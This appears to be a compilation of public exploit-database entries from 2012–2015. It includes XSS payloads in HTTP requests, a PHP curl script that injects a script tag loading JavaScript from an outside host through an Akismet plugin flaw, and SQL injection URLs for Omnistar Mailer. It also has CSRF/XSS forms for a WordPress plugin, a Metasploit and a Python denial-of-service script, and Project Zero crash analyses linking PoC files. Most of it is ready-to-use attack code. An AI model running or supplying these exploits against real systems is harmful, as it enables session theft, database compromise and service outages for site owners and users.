GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28c0570"><img%20src%3da%20onload%3dalert(1)>77b8cd697e9&txtToTime=23%3A59%3A59&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
GET /main.php?page=Reports&subPage=ReportResourceUsage&subsection=edit&operation=submit&range_type=explicit&txtFromDate=2015-07-28&txtFromTime=00%3A00%3A00&txtToDate=2015-07-28&txtToTime=23%3a59%3a592b983"><img%20src%3da%20onload%3dalert(1)>0d9cc3967ae&quickdatevalue=1&quickdatetype=day&relativedate=today&value_%5BselectAll_reportoptions%5D=false&reportoptions%5BreportResourceUtilization%5D-visible-checkbox=true&reportoptions%5BreportResourceUtilization%5D=true&reportoptions%5BchartCPUStats%5D-visible-checkbox=true&reportoptions%5BchartCPUStats%5D=true&reportoptions%5BchartMultiCPUPerformanceTotal%5D=false&reportoptions%5BchartNetworkIO%5D=false&reportoptions%5BchartNetworkErrors%5D=false&reportoptions%5BchartTCPRetransmits%5D=false&reportoptions%5BchartFreeMemory%5D=false&reportoptions%5BchartPageScanningStats%5D=false&reportoptions%5BchartDiskStats%5D=false&reportoptions%5BchartFSCap%5D=false&reportoptions%5BchartWorkloadCPU%5D=false&reportoptions%5BchartWorkloadMemSize%5D=false&reportoptions%5BchartWorkloadRSS%5D=false&reportoptions%5BgroupReportBySystem%5D-visible-checkbox=true&reportoptions%5BgroupReportBySystem%5D=true&listtype=system&value_%5BselectAll_entitygroup%5D=false&value_%5Bincludesubgroups%5D=true&includesubgroups=on&entitygroup%5B1%5D=false&value_%5BselectAll_entityview%5D=false&value_%5BselectAll_entity%5D=false&entity%5B1%5D=false&generate_xml=XML+to+Screen&email_type_save=email_user_save&user_email_id_save=1&other_email_address_save=&save_as_name=&save_as_description=&genopt=htmlscreen&email_type=email_user&user_email_id=1&other_email_address= HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane26cca6"><img%20src%3da%20onload%3dalert(1)>84e475837bc&usermembership%5B%5D=6&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1
-
GET /main.php?section=UserGroup&subsection=add&operation=submit&id=0&usergroupname=kakodane1&usergroupdescription=kakodane2&usermembership%5B%5D=6b50fa%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed94954ba0d3&entitymembership%5B%5D=1&entitygroupmembership%5B%5D=1 HTTP/1.1
Source: https://code.google.com/p/google-security-research/issues/detail?id=424&can=1
The following crash was observed in Microsoft Office 2007 with Microsoft Office File Validation Add-In disabled and Application Verifier enabled for testing and reproduction. This bug also reproduced in Office 2010 running on Windows 7 x86.
The crash is caused by a 1 bit delta from the original file at offset 0x31B. OffViz identified this offset as WordBinaryDocuments[1].WordBinaryDocument[0].WordFIB.FIBTable97.fcPlcfFldMom with an original value of 0x000072C6 and a fuzzed value of 0x00007AC6.
Attached files:
Fuzzed minimized PoC: 2509821532_min.doc
Fuzzed non-minimized PoC: 2509821532_crash.doc
Original non-fuzzed file: 2509821532_orig.doc
DLL Versions:
wwlib.dll: 12.0.6720.5000
msptls.dll: 12.0.6682.5000
Observed Crash:
eax=00000008 ebx=037bbec4 ecx=0f67df76 edx=c0c0c106 esi=00000000 edi=0012caec
eip=3124d7d4 esp=0012c9d8 ebp=0012c9e0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00210202
3124d7ca 8b4d0c mov ecx,dword ptr [ebp+0Ch]
3124d7cd 8b5508 mov edx,dword ptr [ebp+8]
3124d7d0 56 push esi
3124d7d1 57 push edi
3124d7d2 7214 jb wwlib!FMain+0x9231 (3124d7e8)
=> 3124d7d4 8b32 mov esi,dword ptr [edx] ds:0023:c0c0c106=????????
3124d7d6 3b31 cmp esi,dword ptr [ecx]
0:000> kb L8
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012c9e0 3165adbb c0c0c106 0f67df76 00000008 wwlib!FMain+0x921d
0012c9f4 6bdd19f7 3211e7e0 c0c0c0c0 0f67df30 wwlib!DllGetLCID+0x1e64e5
0012caa8 6bdd24c8 0000000f 0012cd90 00127965 MSPTLS!LssbFIsSublineEmpty+0x1f3f
0012cb28 6bddf8e0 00000000 0012cd90 00000000 MSPTLS!LssbFIsSublineEmpty+0x2a10
0012cb8c 6bddff5d 037bbec0 00000000 0012cdb4 MSPTLS!LssbFIsSublineEmpty+0xfe28
0012cbbc 6bddf1ef 00000000 00000000 0ee10fa0 MSPTLS!LssbFIsSublineEmpty+0x104a5
0012cdc0 6bdc4b85 0304a320 00000bc1 00116333 MSPTLS!LssbFIsSublineEmpty+0xf737
0012cdf4 312dbeea 0304a320 00000bc1 00116333 MSPTLS!LsCreateLine+0x23
The value in edx is an application verifier canary value for uninitialized heap data. Looking back up the call stack we can see the instruction that pushed this value:
6bdd19de 8d45d0 lea eax,[ebp-30h]
6bdd19e1 50 push eax
6bdd19e2 ff7704 push dword ptr [edi+4]
6bdd19e5 8b45f8 mov eax,dword ptr [ebp-8]
=> 6bdd19e8 ff704c push dword ptr [eax+4Ch]
6bdd19eb 8b45fc mov eax,dword ptr [ebp-4]
6bdd19ee ff7004 push dword ptr [eax+4]
6bdd19f1 ff908c000000 call dword ptr [eax+8Ch] ds:0023:025ac3ac=3165ada3
6bdd19f7 3bc6 cmp eax,esi
Examining memory at [ebp-8] we see:
0:000> dds poi(ebp-8)-4
11c22cb4 11c22d2c # pointer to next heap chunk
11c22cb8 4e44534c # tag NDSL (eax points here)
11c22cbc 11c22d30 # flink?
11c22cc0 11c22c40 # blink?
11c22cc4 00000aea
11c22cc8 00000aea
11c22ccc 02642ec4
11c22cd0 00000000
11c22cd4 00000000
11c22cd8 00000aea
11c22cdc 00000000
11c22ce0 00000aea
11c22ce4 00000000
11c22ce8 00000000
11c22cec c0c0c0c0
11c22cf0 c0c0000d
11c22cf4 00001800
11c22cf8 00000000
11c22cfc 00001800
11c22d00 00000000
11c22d04 c0c0c0c0 # pushed value (eax+4ch) uninitialized
11c22d08 c0c0c0c0
11c22d0c c0c0c0c0
11c22d10 c0c0c0c0
11c22d14 c0c0c0c0
11c22d18 c0c0c0c0
11c22d1c c0c0c0c0
11c22d20 c0c0c0c0
11c22d24 c0c0c0c0
11c22d28 c0c0c0c0
11c22d2c 11c22da4 # start of next heap chunk
11c22d30 4e44534c
An attacker may control the uninitialized value by first allocating a heap chunk of the same size such that it will land in the same spot as the above chunk. The attacker can write data to the +4ch offset and then free the chunk back to the system. The attacker will then have control over the pointer in eax+4ch when it is used during . If this points to a valid page it will survive the dereferences in the crashing path. It did not look as though there was an immediately path to cause an out of bounds memory write. However, it is likely that this attacker controlled pointer will need to be free-ed later in execution.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37909.zip
source: https://www.securityfocus.com/bid/55749/info
The Akismet plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
#!/usr/bin/php -f
<?php
#
# legacy.php curl exploit
#
//
// HTTP POST,
//
$target = $argv[1];
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL,
"http://$target/wp-content/plugins/akismet/legacy.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE
5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS,
"s=%2522%253E%253Cscript%2520src%253d%2F%2Fsantanafest.com.br%2Fenquete%2Fc%253E%253C%2Fscript%253E");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);
echo $buf;
?>
source: https://www.securityfocus.com/bid/55755/info
Zenphoto is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Zenphoto 1.4.3.2 is vulnerable; prior versions may also be affected.
http://www.example.com/zp-core/zp-extensions/zenpage/admin-news-articles.php?date=%22%3E%3Cscript%3Ealert%28%27Cookie%20sealing%20Javascript%27%29;%3C/script%3E%3C>
source: https://www.securityfocus.com/bid/55760/info
Omnistar Mailer is prone to multiple SQL-injection vulnerabilities and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting these issues may allow an attacker to compromise the application, access or modify data, exploit vulnerabilities in the underlying database, execute HTML and script code in the context of the affected site, and steal cookie-based authentication credentials; other attacks are also possible.
Omnistar Mailer 7.2 is vulnerable; other versions may also be affected.
http://www.example.com/mailertest/admin/responder.php?op=edit&id=-37'+Union+Select+version(),2,3--%20-#[SQLi]
http://www.example.com/mailer/admin/preview.php?id=-2'+union+Select+1--%20-[SQLi]
http://www.example.com/mailer/admin/pages.php?form_id=-2'+Union+Select+version(),2,3--%20-#%20-&op=list[SQLi]
http://www.example.com/mailer/admin/navlinks.php?op=edit&nav_id=9''+Union+Select+version(),2,3--%20-#[SQLi]
http://www.example.com/mailertest/users/register.php?nav_id=-18'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20-[SQLi]
http://www.example.com/mailertest/admin/pages.php?op=edit&id=16&form_id=2'[SQLi]
http://www.example.com/mailertest/admin/contacts.php?op=edit&id=3&form_id=2'[SQLi]
http://www.example.com/mailertest/users/index.php?profile=1&form_id=2'[SQLi]
http://www.example.com/mailertest/users/register.php?form_id=2'[SQLi]
source: https://www.securityfocus.com/bid/55761/info
PowerTCP WebServer for ActiveX is prone to a remote denial-of-service vulnerability.
Attackers can exploit this issue to crash the application (typically Internet Explorer), denying service to legitimate users.
PowerTCP WebServer for ActiveX 1.9.2 is vulnerable; other versions may also be affected.
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Description' => %q{ 'Name' => 'Dart Webserver
<= 1.9.0 Stack Overflow',
Dart Webserver from Dart Communications throws a stack
overflow exception
when processing large requests.
}
,
'Author' => [
'catatonicprime'
],
'Version' => '$Revision: 15513 $',
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2012-3819' ],
],
'DisclosureDate' => '9/28/2012'))
register_options([
Opt::RPORT(80),
OptInt.new('SIZE', [ true, 'Estimated stack size to exhaust',
'520000' ])
])
end
def run
serverIP = datastore['RHOST']
if (datastore['RPORT'].to_i != 80)
serverIP += ":" + datastore['RPORT'].to_s
end
size = datastore['SIZE']
print_status("Crashing the server ...")
request = "A" * size + "\r\n\r\n"
connect
sock.put(request)
disconnect
end
end
[+] Exploit Title : Wordpress Googmonify Plug-in XSS/CSRF
[+] Exploit Author : Ehsan Hosseini
[+] Date: 2015-08-21
[+] Vendor Homepage : https://wordpress.org/plugins/googmonify/
[+] Software Link : https://downloads.wordpress.org/plugin/googmonify.zip
[+] Version : 0.8.1
[+] Tested On : Windows FireFox
[+] CVE : N/A
===============================
Vulnerable Code : googmonify.php - Line 190,194,208
<input id="PID" name="PID" type="text" value="<?php echo $pid; ?>">
<input id= "Limit" name="Limit" type="text" value="<?php echo $limit;
?>" size="5">
<input id="AID" name="AID" type="text" value="<?php echo $aid; ?>">
===============================
Exploit 1 (Just CSRF):
<form method="POST"
action="http://[URL]/[Path]/wp-admin/options-general.php?page=googmonify.php">
<input name="PID" type="hidden" value='Ehsan Hosseini'>
<input name="Limit" type="hidden" value="0">
<input name="Analytics" type="hidden" value="0" >
<input name="AID" type="hidden" value="Ehsan Hosseini">
<input name="GoogmonifyUpdate" type="submit" value="Update Options »">
</form>
Exploit 2 (CSRF & XSS):
<form method="POST"
action="http://[URL]/[Path]/wp-admin/options-general.php?page=googmonify.php">
<input name="PID" type="hidden"
value='"><script>alert(document.cookie)</script>'>
<input name="Limit" type="hidden" value="0">
<input name="Analytics" type="hidden" value="0" >
<input name="AID" type="hidden" value='"><script>alert(/Ehsan
Hosseini/)</script>'>
<input name="GoogmonifyUpdate" type="submit" value="Update Options »">
</form>
===============================
Patch : googmonify.php - Line 190,194,208
<input id="PID" name="PID" type="text" value="<?php echo
htmlspecialchars($pid); ?>">
<input id= "Limit" name="Limit" type="text" value="<?php echo
htmlspecialchars($limit); ?>" size="5">
<input id="AID" name="AID" type="text" value="<?php echo
htmlspecialchars($aid); ?>">
===============================
Discovered By : Ehsan Hosseini.
# Exploit Title: WordPress MDC Private Message Persistent XSS
# Date: 8/20/15
# Exploit Author: Chris Kellum
# Vendor Homepage: http://medhabi.com/
# https://wordpress.org/plugins/mdc-private-message/
# Version: 1.0.0
=====================
Vulnerability Details
=====================
The 'message' field doesn't sanitize input, allowing a less privileged user (Editor, Author, etc.)
to execute an XSS attack against an Administrator.
Proof of Concept:
Place <script>alert('Hello!')</script> in the message field of a private message and then submit.
Open the message and the alert window will fire.
===================
Disclosure Timeline
===================
8/16/15 - Vendor notified.
8/19/15 - Version 1.0.1 released.
8/20/15 - Public Disclosure.
#!/usr/bin/python
# Exploit Title: Konica Minolta FTP Utility 1.0 Remote DoS PoC
# Date: 21-08-2015
# Exploit Author: Shankar Damodaran
# Vendor Homepage: http://www.konicaminolta.com/
# Software Link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Version: 1.0
# Tested on: Microsoft Windows XP Professional SP3 English
import socket
# The ip address of the remote host
ftphost = '192.168.1.7'
# The port of the remote host
ftpport = 21
# Fuzzed packet of a certain length, Appending this to the USER command and requesting the remote ftp server denies requests for other legitimate users.
crafted_user_name= "B" * 450012 # DoS
# Establishing connection
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect((ftphost,ftpport))
s.recv(1024)
# Sending the evil input.
s.send('USER' + crafted_user_name +'\r\n')
# Once the packet has been sent, the DoS will occur on the remote FTP server. By sending an interrupt through (Ctrl+C), will resume the FTP server from DoS. (Note : The FTP server will not get crashed)
s.send('QUIT \r\n')
s.close()
# End of PoC - Shankar Damodaran
Source: https://code.google.com/p/google-security-research/issues/detail?id=401&can=1
We have encountered a Windows kernel crash in the win32k!fsc_RemoveDups function while processing corrupted TTF font files, such as:
---
PAGE_FAULT_IN_NONPAGED_AREA (50)
Invalid system memory was referenced. This cannot be protected by try-except,
it must be protected by a Probe. Typically the address is just plain bad or it
is pointing at freed memory.
Arguments:
Arg1: ff6e7000, memory referenced.
Arg2: 00000000, value 0 = read operation, 1 = write operation.
Arg3: 91e809df, If non-zero, the instruction address which referenced the bad memory
address.
Arg4: 00000000, (reserved)
Debugging Details:
------------------
Could not read faulting driver name
READ_ADDRESS: GetPointerFromAddress: unable to read from 8277c84c
Unable to read MiSystemVaType memory at 8275bf00
ff6e7000
FAULTING_IP:
win32k!fsc_RemoveDups+85
91e809df 3918 cmp dword ptr [eax],ebx
MM_INTERNAL_CODE: 0
DEFAULT_BUCKET_ID: VISTA_DRIVER_FAULT
BUGCHECK_STR: 0x50
PROCESS_NAME: csrss.exe
CURRENT_IRQL: 0
LAST_CONTROL_TRANSFER: from 91e8015c to 91e809df
STACK_TEXT:
969e3624 91e8015c 969e3858 fbff0e78 0000002b win32k!fsc_RemoveDups+0x85
969e36cc 91e89979 ff6de010 ff6de07c 00000001 win32k!fs_FindBitMapSize+0x2de
969e36e8 91e89b59 fbff0e78 0000002b 00000001 win32k!bGetGlyphMetrics+0x39
969e382c 91e7ec63 fbff0e78 0000002b 969e3918 win32k!lGetGlyphBitmap+0x2b
969e3850 91e7eab6 00000000 00000001 0000002b win32k!ttfdQueryFontData+0x158
969e38a0 91e7dce2 ff7af010 fbe0ccf0 00000001 win32k!ttfdSemQueryFontData+0x45
969e38e8 91e83774 ff7af010 fbe0ccf0 00000001 win32k!PDEVOBJ::QueryFontData+0x3e
969e3960 91efbc8d 969e3c3c fbe2cc94 ff713154 win32k!xInsertMetricsPlusRFONTOBJ+0x120
969e3990 91e7594d 0000000a ff7bf000 969e3cd0 win32k!RFONTOBJ::bGetGlyphMetricsPlus+0x179
969e39c8 91efb78b 969e3c1c 969e3c3c 00000008 win32k!ESTROBJ::vCharPos_H3+0xf0
969e3a0c 91e755d0 969e3cd0 0000000a 969e3c1c win32k!ESTROBJ::vInit+0x268
969e3c2c 91e75793 00000000 969e3cd0 fbe0ccf0 win32k!GreGetTextExtentExW+0x12a
969e3d0c 8264f896 0701015e 02bb0bac 0000000a win32k!NtGdiGetTextExtentExW+0x141
969e3d0c 779670f4 0701015e 02bb0bac 0000000a nt!KiSystemServicePostCall
WARNING: Frame IP not in any known module. Following frames may be wrong.
0015f434 00000000 00000000 00000000 00000000 0x779670f4
---
While we have not determined the specific root cause of the vulnerability, we have pinpointed the offending mutations to reside in the "glyf" table.
The issue reproduces on Windows 7 and 8.1. It is easiest to reproduce with Special Pools enabled for win32k.sys (leading to an immediate crash when the bug is triggered), but it is also possible to observe a crash on a default Windows installation in win32k!fsc_RemoveDups or another location in kernel space. In order to reproduce the problem with the provided samples, it might be necessary to use a custom program which displays all of the font's glyphs at various point sizes.
Attached is a proof of concept font file together with the corresponding kernel crash log.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/37915.zip